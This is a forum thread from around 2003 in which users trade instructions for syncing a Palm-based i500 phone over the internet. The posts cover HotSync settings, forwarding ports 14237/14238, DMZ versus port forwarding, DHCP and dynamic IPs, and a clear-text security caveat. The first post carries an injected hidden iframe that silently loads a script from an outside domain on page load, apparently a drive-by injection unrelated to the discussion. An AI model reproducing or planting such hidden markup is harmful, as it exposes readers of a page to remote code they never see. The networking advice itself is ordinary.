+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast
    The Dawn of SmartPhones Tony_ensemble's Avatar

Wireless Sync option on the i500

There is a wireless sync option on the i500. This is new. Does anyone know what this does? How it works? If it works? Etc...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The Saxon word for depression can be literally translated as "without beer", proving again that the Vikings were the pinnacle of all humankind.

Just did a network sync, not sure if this is what you are referring to, but i was sitting in my living room while my computer was in the home office and synced up the Palm...very nice

Nothing like using Sprint's unlimited Vision for that Wonder how the stream looks and how secure it is...

Greg
    Connecting you with what is important...http://3gwiz.com

Quite Convergent
    Can you set a time interval for network syncs? If only it would push....

I'm not sure if thats it. I was hoping for something a little more distant.
    The Saxon word for depression can be literally translated as "without beer", proving again that the Vikings were the pinnacle of all humankind.

It was using the Vision network...I could have been at my office downtown and it would have worked..heck I could have been in California and it would have worked.

Quite Convergent

still want "push"!

Excellent - a network sync might be part of the solution, but it is still far from "push". Some of the most promising 3rd party solutions for push (such as Notify Link and Syncrologic Email Accellerator) use SMS to notify the PDA to go get the email. Does any one know if this SMS could come throgh 3rd party SMS software?

PHO
    Broward County Florida, "Home of the Hanging Chad"
    ok kiddies, Funny thing is we just went over this issue in another thread, ill post below the same instructions that i posted from someone else in teh Buisness connect thread. I wanted to have it tested first, then we should put it in the FAQ

Tony, if you ssetup the over air sync, and start it, the internet/ vision icons start going CRAZY, but it doesn't dial in. That is a network hotsync/ local hotsync over air. I figure that is for Wi Fi or Blue Tooth (obviously hotsync is designed for more than just the i500) I make this conclusion because its "over air" and doesn't use the phone.

But, you can do a vision/ over air hotsync. Greg has confirmed the old setup still works.

Here it is again.

----------------------------------------------------
    It is completely possible to HotSync your i330 over the internet by following the following steps. I’ll be the first to admit that you have to jump through some hoops to get it working (and remembering all the settings you need), but once you do it a couple times, it’s a snap.

The instructions are broken down so that you make changes to the phone, the HotSync Computer, and then finally doing your first Sync. Don’t skip any steps.

**** Setup on your i330 Phone ****
    1. Click on the HotSync icon
    2. Go to Options --> Modem Sync Preferences. Choose “Network”
    3. Go to Options --> LanSync Preferences. Choose “Local HotSync”
    4. Go to Options --> Primary PC Address.
    ___ a. Set “Primary PC Name” to "!!" (2 exclamation points with no quotes).
    ___ b. Set “Primary PC Address” to the IP address of the computer(or router) that is attached to the internet.
    ___ c. Leave “Subnet Mask” blank
    5. Go to Options --> Connection Setup. Make sure “Direct Serial” is highlighted. Click “Done”.

**** Setup on your Computer ****
    1. Right-click the HotSync icon in the System tray and choose Setup.
    2. Click the Network tab
    3. Make sure the Profile you want to sync has a checkmark in the checkbox
    4. Click the TCP/IP Settings and make sure that your correct IP address is chosen. If you only have one Network adapter (in most cases) this will be grayed-out.
    5. Leave Subnet Mask blank and click OK.
    6. Click OK again to close the Setup window.
    7. Right-click the HotSync icon in the System tray and make sure “Network” has a checkmark next to it.

**** Firewalls & Routers ****
    If your computer is behind a firewall or it has a router between it and the internet, you will have to do the following.

1. Make sure you have the following ports open: TCP:14237 & TCP:14238. This is how HotSync (on your phone) communicates with HotSync on your computer. So if you use a software firewall, you will have to allow HotSync to communicate with the internet over these ports. The Palm website indicates that port 14238 is for UDP, but my tests indicate that communication is happening on TCP.
    2. If you use a router, you will have to have all requests on those ports forward to the internal computer with HotSync

**** Doing your first HotSync over the Internet ****
    1. Click on HotSync and on the main screen, change from “Local” to “Modem”
    2. When you change to Modem, it should show you “Sprint” as who it will dial.
    3. Press the HotSync icon on this screen. HotSync will dial out to Sprint and initiate the synchronizing. You will see the HotSync notification box popup on the HotSync computer as the process happens (just as it would if it was a local HotSync.)

**** Notes ***
    Thanks to member "Get Wright" for this one!
    Setting the "Primary PC Name" to "!!" will prevent the HotSync settings in the i330 from getting set to their internal (Private LAN) settings.

Must use actual IP Address
    Apparently DNS doesn’t work, because when I try to use my DNS name, which will forward to my Dynamic IP Address, it doesn’t work. If anyone knows how to get this to work, please let me know.

Jason
    Jason@osp-chicago.com
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

PHO
    As for the timed sync.

There are programs, i am testing one that can do a timed macro.

You can then set a macro to do a sync.

those "push" solutions that send you an SMS is CRAP.

IF you have outlook, you can set a rule to send an email to your SMS whenver you get an email so SOMEONE GET ME A SOLUTION, jeez it can't be that tuff.

actually i think the issue is you need provider support from sprint.

Considering that they can't get sms right, i don't see push mail anytime soon
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

Quite Convergent
    PHO said:
    actually i think the issue is you need provider support from sprint.
    Considering that they can't get sms right, i don't see push mail anytime soon
    ---------------------------------------------------------
    I hope you're wrong but I'm afraid you're right. Anyone with Sprint care to comment? Any 3rd party care to step up to the plate?

There was discussion about "true SMS" in Dallas, nothing solid.

Greg

My Network admin guy is contacting the corporate headquarter to see if they will allow us to open up the required ports.

Sheesh.... the levels of coporate red tape you have to go through to do something simple. Its a wonder we are able to get anything done at work.

Thanks again Pho for a great tip.

Thanks to you too Greg.

Ah hell... Thanks to everyone for everything!!!!

PHO
    Originally posted by Tony_ensemble

Ah hell... Thanks to everyone for everything!!!!
    on behalf of Everyone, your welcome

Your supposed to say, Except for that one chick, who gave me the rash, then didnt' call back . . .

(say it like strongbad)

anyway, i still can't get mine to work. I have tested port forwarding, i have set allt he appropriate settings. Very frustrating. I got it to work no problem when my computer had the static IP, but my new ISP will only give the Router the Static.

Rrr

www.grtalk.com

Has anyone successfully performed a network sync? I think I'm missing some setting, because it isn't working. I followed the above instructions except in connection setup there is no serial option, do i want cradle/Cable, IR PC/handheld, Internal cdma phone, wirless cdma modem?

i tried all still nothing!
    any ideas?

I have it working, you want cradle/cable.

Just a caveat, your data is flying across the network and air in clear text. For those who care just a little about security this is a huge issue. Additionally if you store credit card info or account info in your Palm...just imagine the possible issues.

Greg

Originally posted by JRoss
    Has anyone successfully performed a network sync? I think I'm missing some setting, because it isn't working. I followed the above instructions except in connection setup there is no serial option, do i want cradle/Cable, IR PC/handheld, Internal cdma phone, wirless cdma modem?

any ideas?

PHO

any ideas?
    Are you using a router? the D-Link wireless router is not letting me hotsync, even with the ports forwarded. If you put the computer in the DMZ then it syncs.

D LInk does not have a native IP tracking program to figure what what information is going where, we figure that the router is using some other port and its not open. I am going to get a sniffer program to track that and see if its the answer.

But if your using Dlink try putting your computer in the DMZ, if it syncs, your having hte same issue i am.

www.grtalk.com

yeah got a linksys router, not wireless though. What is DMZ mode? (I'm not the one who set up the router)

PHO
    yeah got a linksys router, not wireless though. What is DMZ mode? (I'm not the one who set up the router)
    If you have the firewall setup on the router, then you need to open those ports. D link is different than linksys. Linksys is good Dlink is crap. So it should work for you, if you open up the ports.

DMZ = Demilitarized zone - bascially taking 1 computer outside the firewall.

Did you open up the ports?

www.grtalk.com

Ok, I have the network wireless sync working. Could this be used to restore my i500 data after a hard reset? I'm thinking it would work, although it would be SLOW.

The scenario I envision is that I am travelling, lose my data, my wife is at home to give me any information I need such as the ip address of our computer etc. Once the hotsync starts, she might have to click on the user name of the handheld but other than that it should work, shouldn't it?

Hey guys can someone walk me thru the wireless sync, I'm not a networking guy.

I have Cable internet thru a Linksys router. My i500 syncs to a laptop which travels to work with me every day.

1) How do I enable the ports TCP:14237 & TCP:14238?
    2) I have the router set up as a DHCP, so every time I get home it assigns my laptop an IP address. From what I understand this is a local IP address under NAT. In this situation what IP address should I put in if I want to connect over the internet?
    3) In my connection preferences I do not see an option for direct serial. I only see options for cradle/cable, ir to pc, internal CDMA and wireless cdma modem.

Thanks much guys, I really would love to make this work and ditch the cables!!

Originally posted by SpineDoc
    Hey guys can someone walk me thru the wireless sync, I'm not a networking guy.

I have Cable internet thru a Linksys router. My i500 syncs to a laptop which travels to work with me every day.

1) How do I enable the ports TCP:14237 & TCP:14238?
    2) I have the router set up as a DHCP, so every time I get home it assigns my laptop an IP address. From what I understand this is a local IP address under NAT. In this situation what IP address should I put in if I want to connect over the internet?
    3) In my connection preferences I do not see an option for direct serial. I only see options for cradle/cable, ir to pc, internal CDMA and wireless cdma modem.

Thanks much guys, I really would love to make this work and ditch the cables!!
    I have not yet performed a nework sync myself, so my answers here are based purely on my networking knowledge. I have a Linksys as well, but different versions differ slightly in their configuration, so exact details may vary.

First, the IP address you plug into your phone will be the IP address of your (Linksys) router / firewall. That said, the majority of ISPs don't give you a static IP address; they instead give you a dynamic address. Wether or not this address will actually change frequently will vary. So your first problem is going to be that every time you network sync, you may have to first figure out what your current IP address is from your ISP and then plug this into your i500. As has been mentioned in this thread, if the i500 / Palm HotSynch software properly supported using a DNS name rather than an IP address, you would be able to work around this. You could load dynamic IP address tracking software (dyndns.com, no-ip.org, etc.) on a computer in your house, and their website and software would autmotically update a name you choose (such as spinedoc.no-ip.org). But apparently plugging in the name spinedoc.no-ip.org in the Palm HotSync software doesn't work (I haven't tried this). The solution is probably to set up a dynamic IP tracker name anyway. Then, when you need to hotsync, you can figure out your current IP address by asking the tracking service. You could load a "ping" program onto your Plam and "ping" spinedoc.no-ip.org to get the latest address. Or, if you run a web server at home, you could maybe hit your personal web server with Blazer to get the IP address. Not sure if Blazer will reveal it, so you might have to write a web page that displays it. The low-tech solution is to call home and ask the wife to help out, as someone on the thread suggested. This will get old real fast and probably only be useful for emergency hard reset recovery use.

OK, moving on. You've solved the problem of figuring out your home network's current Dynamic IP address (or your ISP gives you a static IP like mine does). You plug that into the i500. Now we're getting to the meat of your questions, SpineDoc. How do we get the i500 to be able to talk through your router / firewall (Linksys) to one of the computer(s) on your home network. And which computer, if there is more than one? After all, the Internet sees only the one IP address of the router.

There are typically two options here. You can select one computer in your house and essentially tell the router / firewall to treat that computer as if it were "outside" the firewall. If you had a home computer dedicated to being a web server, for instance, this would probably be what you would do. Most routers / firewalls call this "putting a computer in the de-militarized zone (DMZ)." This is really poor terminology, since this is not a de-militarized zone -- hackers around the world can and will attempt to hack into any system in the DMZ. It's more appropriately called an "unprotected zone." This is the easiest mechanism to set up, but as you can tell, the more dangerous.

The second mechanism is called "port forwarding." In this method, you pick specific IP port numbers, and tell your router to forward incoming traffic to a specific computer. Thus, for example, if traffic arrives for port 14237 or 14238, you could have your router set to forward that traffic to a specific computer on your local network. This is trickier to set up because you have to figure out all the required ports, and whether or not they are UDP or TCP ports.

Now, you understand both of the above... but in either case, you may still have a problem -- how do you tell the router which specific local computer to put int he DMZ or to forward ports to? Typically, your home router is set up to use dynamic IP assignment. In this case, rather than talking about the Internet address, we're talking about the local addresses within your house. Typically, the router "randomly" assigns addresses to each of the local computers using a protocol and service known as DHCP (Dynamic Host Configuration Protocol, if I recall correctly).

In this case, with most home routers, you have a problem. Essentially, what you will have to do, is probably not use DHCP for the machine with which you want to Network HotSync. If your router allows you to specify by the hardware MAC address which address to assign via DHCP (making it not quite so dynamic), you're in luck. The firmware on my Linksys doesn't really allow this, though it might for wireless devices. So, you'll probably have to assign a fixed IP address to this computer -- and make sure it fits in with the numbering scheme the router is using to assign DHCP addresses to the other systems on your network. For instance, if you are dynamically assigning addresses 192.168.1.100-254 to your home computers, you might use fixed address 192.168.1.2 for your desgnated Net HotSync computer. You'll have to reconfigure the IP on that computer to use this specific address rather than dynamically obtaining one. Which means you'll also have to manually tell this computer other information it would typically get from the router during DHCP. Primarily, this means you'll have to tell it the IP address to use as a gateway, the DNS server(s) to use at your ISP.

The IP address to use as a gateway will be your router's LAN address. This will typically be 192.168.1.1 unless you changed it. The DNS servers, if you don't know them, you can get by asking one of your currently working computers. In a DOS Command prompt, use "IPCONFIG /all". Or under Win9x/Me, run WINIPCFG.

Technically, your ISP could switch up your DNS servers, which would mess you up, but this generally doesn't happen.

So, specifically, on the Linksys where do you set the DMZ or tunneling? As I said, this varies by model. On mine (combined Cable/DSL router, 10/100 4 port switching hub, and 802.11b WiFi bridging access point), you go to the main conguration screen (by default, http://192.168.1.1) and click on Advanced and then either Forwarding or DMZ Host.

Whew. Good luck!

I wonder what happens if you try and put the DNS name in place of the two !!s? Probably doesn't work.
    Last edited by robo45h; 08-17-2003 at 09:51 AM.